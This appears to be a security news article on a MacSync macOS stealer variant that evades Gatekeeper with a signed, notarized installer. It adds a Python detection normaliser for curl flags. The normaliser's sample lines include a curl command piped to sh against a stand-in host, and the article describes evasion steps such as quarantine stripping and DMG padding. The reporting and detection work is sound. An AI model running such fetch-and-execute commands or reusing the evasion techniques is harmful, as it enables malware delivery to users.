New MacSync macOS Stealer Bypasses Apple Gatekeeper Using a Signed, Notarized Swift App
Security analysts have identified a new variant of the macOS information-stealing malware MacSync, delivered via a digitally signed and notarized Swift application that impersonates a messaging app installer in order to bypass Apple’s Gatekeeper controls.
“Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or -style techniques, this sample adopts a more deceptive, hands-off approach,” Jamf researcher Thijs Xhaflaire said.
The Apple device management and security vendor noted that the current build is distributed as a code-signed and notarized Swift application packaged inside a disk image (DMG) named “zk-call-messenger-installer-3.9.2-lts.dmg,” which is made available from “zkcall[.]net/download.”
Because the app is signed and notarized, it launches without being blocked or flagged by native macOS protections such as Gatekeeper or XProtect. Even so, the installer still shows users instructions to right-click the app and choose Open, the long-standing workaround for Gatekeeper's default block on unsigned or un-notarized software, which suggests the operators expect the distribution to keep working after the signature is revoked. Apple has since revoked the associated code-signing certificate.
After launch, the Swift-based dropper performs several checks before retrieving and running an encoded script via a helper component. These include confirming internet connectivity, enforcing a minimum delay of roughly 3600 seconds (one hour) between executions to rate-limit activity, stripping the quarantine extended attribute (com.apple.quarantine) so the fetched payload is not subject to Gatekeeper's launch checks, and validating the downloaded file before running it.
“Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants,” Xhaflaire explained. “Rather than using the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and additional options like --noproxy have been introduced.”
“These changes, along with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely aimed at improving reliability or evading detection.”
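The flag-splitting described above only defeats detections that match the literal string "-fsSL". The following is an added example (not code from Jamf or from the article) of a normaliser that reduces any curl invocation to the set of long option names it actually uses, so -fsSL, -fL -sS and --fail --silent --show-error --location all produce the same verdict, and the presence of --noproxy is surfaced as a separate indicator. The sample process-execution lines and the example.invalid hosts are constructed for illustration; the option table covers only the handful of curl flags relevant here.

```python
import os
import shlex

# Short curl options mapped to their long names, so a rule can key on meaning
# rather than on how the operator chose to spell or group the flags.
SHORT_TO_LONG = {
    "f": "fail", "s": "silent", "S": "show-error", "L": "location",
    "k": "insecure", "o": "output", "O": "remote-name", "I": "head",
    "x": "proxy", "A": "user-agent", "H": "header", "d": "data",
}
# Options that consume a value, either glued on (-o/tmp/x) or as the next token.
TAKES_VALUE = {"output", "proxy", "user-agent", "header", "data", "noproxy", "url"}
# Tokens at which the shell command line stops belonging to curl.
SHELL_SEPARATORS = {"|", "||", "&&", ";"}


def normalize_curl(cmdline):
    """Parse one shell command line. Returns (flags, urls) when the command is
    curl, else None. flags is a set of long option names; urls the positional
    arguments that were not consumed as option values."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or os.path.basename(argv[0]) != "curl":
        return None
    flags, urls = set(), []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in SHELL_SEPARATORS:
            break
        if tok.startswith("--") and len(tok) > 2:
            name, _, value = tok[2:].partition("=")
            flags.add(name)
            if name in TAKES_VALUE and not value:
                i += 1                       # value is the following token
        elif tok.startswith("-") and len(tok) > 1:
            # A cluster such as -fsSL; a value-taking option ends the cluster.
            for pos, ch in enumerate(tok[1:], start=1):
                name = SHORT_TO_LONG.get(ch, ch)
                flags.add(name)
                if name in TAKES_VALUE:
                    if pos == len(tok) - 1:  # nothing glued on: consume next token
                        i += 1
                    break
        else:
            urls.append(tok)
        i += 1
    return flags, urls


# The semantics of "-fsSL": fail quietly, stay silent, show errors, follow redirects.
SILENT_FETCH = {"fail", "silent", "show-error", "location"}


def classify_curl(cmdline):
    """Detection verdict for one command line, independent of flag spelling."""
    parsed = normalize_curl(cmdline)
    if parsed is None:
        return None
    flags, urls = parsed
    return {
        "silent_fetch": SILENT_FETCH <= flags,   # same set regardless of grouping
        "noproxy": "noproxy" in flags,           # extra indicator noted by Jamf
        "urls": urls,
    }


# Constructed sample process-execution lines (not real telemetry).
SAMPLE_EVENTS = [
    "curl -fsSL https://example.invalid/a.sh | sh",
    "curl -fL -sS --noproxy '*' -o /tmp/x https://example.invalid/b",
    "curl --fail --silent --show-error --location https://example.invalid/c",
    "curl -sS -o report.pdf https://example.invalid/report.pdf",
    "/usr/bin/curl -I https://example.invalid/",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(classify_curl(line), "<-", line)
```

Running the block prints one verdict per sample line: the first three (grouped, split and long-form spellings of the same four options) are all flagged as a silent fetch, the second additionally reports noproxy, and the last two are not flagged because they lack -f or -L. A rule built on the normalised set is unaffected by further regrouping of the same flags; it would still need pairing with the download target and the parent process to be a useful alert on its own.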
The campaign also adds a size-based evasion: the DMG is inflated to 25.5 MB by padding it with unrelated PDF files, which slows static inspection and defeats heuristics that treat unusually small installers as suspicious.
The Base64-encoded payload, once decoded, maps to MacSync, a rebranded iteration of Mac.c first observed in April 2025. According to MacPaw’s Moonlock Lab, MacSync comes with a fully featured Go-based agent that extends beyond simple credential or data theft to provide full remote command-and-control functionality.
Signed malicious DMG files spoofing Google Meet have similarly been used in intrusions distributing other macOS stealers such as Odyssey. At the same time, threat actors have continued to deliver DigitStealer using unsigned disk images as recently as last month.
“This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” Jamf said.